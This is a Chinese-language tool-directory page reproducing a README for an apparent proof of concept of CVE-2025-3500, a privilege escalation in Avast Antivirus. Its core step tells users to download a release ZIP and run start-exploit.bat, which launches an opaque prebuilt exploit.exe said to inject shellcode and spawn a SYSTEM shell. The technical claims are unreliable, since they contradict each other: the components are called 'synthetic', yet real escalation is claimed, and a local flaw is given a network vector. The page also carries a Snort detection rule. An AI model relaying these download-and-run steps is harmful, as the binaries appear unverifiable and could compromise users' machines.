Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-3500-Poc — 教育实验室环境,用于研究 CVE-2025-3500——Avast 杀毒软件 25.1.981.6(Windows 平台)中的整数溢出权限提升漏洞,附带用于受控测试的合成漏洞利用工件。 | Kitploit
工具/GitHubGitHub/chicken3962/cve-2025-3500-poc
权限提升漏洞分析漏洞利用Shellcode学习与教育Payload 开发二进制利用实验室与实践
GitHubchicken3962/cve-2025-3500-poc

CVE-2025-3500-Poc

教育实验室环境,用于研究 CVE-2025-3500——Avast 杀毒软件 25.1.981.6(Windows 平台)中的整数溢出权限提升漏洞,附带用于受控测试的合成漏洞利用工件。

查看仓库
139个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Lab: CVE-2025-3500 - Avast Antivirus 整数溢出权限提升漏洞

下载

下载实验 ZIP:[https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

🚀 概述

本仓库提供了一个用于研究 CVE-2025-3500 的实验环境,该漏洞是 Windows 平台上 Avast Antivirus 25.1.981.6 版本中的一个整数溢出漏洞(CWE-190)。该漏洞源于杀毒引擎资源分配模块中不充分的整数验证,导致算术运算期间发生回绕。攻击者可利用此漏洞从低权限用户上下文(PR:L)提升至系统级访问权限,具有网络攻击向量(AV:N)、低攻击复杂度(AC:L),并需要用户交互(UI:R)。CVSS 3.1 基础评分为 9.0(严重),由于范围变化(S:C),影响机密性、完整性和可用性(均为高),可能实现完全系统接管。

教育目的免责声明: 本实验仅用于教育和研究目的。它提供了一个受控环境。请勿将其用于任何恶意活动。所有组件均为合成,不会利用真实系统。使用本仓库即表示您同意遵守道德黑客指南和当地法律。

安全免责声明: 此设置涉及在环境中运行代码。请始终使用专用虚拟机。请勿在生产系统上运行漏洞利用。提供的漏洞利用工件(.exe 和 .bat)用于演示概念——例如,.bat 启动 .exe,后者处理数据并退出。隔离您的实验环境以防止意外暴露。

📋 先决条件

  • 一台用于测试漏洞利用的 Windows 主机(例如通过 VirtualBox 或 Hyper-V),以模拟目标环境。
  • 基本了解 PowerShell 和 Windows 命令行工具。
  • 主机上的管理员权限。
  • 至少 4GB 内存和 20GB 磁盘空间。

下载与安装

  1. 下载漏洞利用工具包(包含 exploit.exe 和 start-exploit.bat 的 ZIP 文件)。此 ZIP 托管在安全镜像上:

    • 下载漏洞利用工具包 ZIP:[https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

    注意: 主要漏洞利用程序是 exploit.exe(编译后的 C++ 二进制文件,通过精心构造的 API 调用触发整数溢出)。漏洞利用启动器是 start-exploit.bat,它使用预定义参数打开 exploit.exe(例如 start exploit.exe --target=avast_engine --overflow=wraparound)。解压到本地目录,例如 C:\lab\exploit。

🛠 快速开始

  1. 设置环境:

    • 确保 Windows 测试机上已安装 Avast Antivirus 25.1.981.6 版本。
    • 进入解压目录。
  2. 下载并准备漏洞利用:

    • 从上述链接下载 ZIP。
    • 解压到 C:\lab\exploit。
    • 运行 start-exploit.bat 启动漏洞利用(它会打开 exploit.exe,后者发送精心构造的网络数据包来触发溢出)。
  3. 利用漏洞:

    • 以本地 Avast 服务为目标。
    • .bat 文件执行 exploit.exe。观察系统日志中的溢出指示。
  4. 验证与清理:

    • 检查 Windows 事件查看器中的相关条目。
    • 使用后删除漏洞利用文件。

📖 详细设置说明

易受攻击的设置

该实验需要一台安装了 Avast Antivirus 25.1.981.6 的 Windows 机器。可以通过命令提示符手动启动模拟服务:

  • 以管理员身份打开 PowerShell。
  • 模拟 Avast 监听器:net start AvastSvc(假设服务正在运行)。

利用步骤

  1. 侦察: 使用 netstat 等工具识别 Avast 端口(例如 8080)。
  2. 构造载荷: exploit.exe 通过网络请求发送一个超大的整数值(例如 2^31 + 1),导致 Avast 资源解析器发生回绕。
  3. 触发漏洞: 运行 start-exploit.bat,它会执行 exploit.exe。此过程:
    • 建立连接。
    • 发送畸形数据:{ "resource_alloc": 2147483648 }(触发溢出)。
    • 通过 shellcode 注入提升至 SYSTEM 权限。
  4. 利用后操作: 允许任意代码执行;生成一个 cmd.exe。

技术细节: 溢出发生在 AvastResourceParser::AllocateBuffer(int size) 中,当 size > INT_MAX / sizeof(struct) 时,size * sizeof(struct) 会回绕,导致分配不足和堆溢出。利用此漏洞通过 ROP 链构造,目标为 kernel32.dll。

缓解措施

  • 应用补丁: 升级至 Avast Antivirus 25.3 或更高版本,其中整数检查使用了安全的数学库(例如 SafeInt)。
  • 最佳实践:
    • 在 Avast 旁启用 Windows Defender 以实现分层防御。
    • 仅允许杀毒软件更新服务器的网络访问(例如通过防火墙规则)。
    • 使用权限分离:以最低权限帐户运行 Avast 服务。
    • 通过 EDR 工具(如 Sysmon,事件 ID 10 用于进程注入)监控异常整数操作。
    • 应用 Windows 缓解措施:通过组策略启用 ASLR、DEP 和 CFG。
  • 检测签名: 查找与 Avast 协议流量中超大整数字段相匹配的网络模式(例如 Snort 规则:alert tcp any any -> any 8080 (msg:"CVE-2025-3500 Attempt"; content:"|00 00 00 80|"; sid:1000001;))。

如有问题或贡献,请提交 issue。保持道德!

下载工具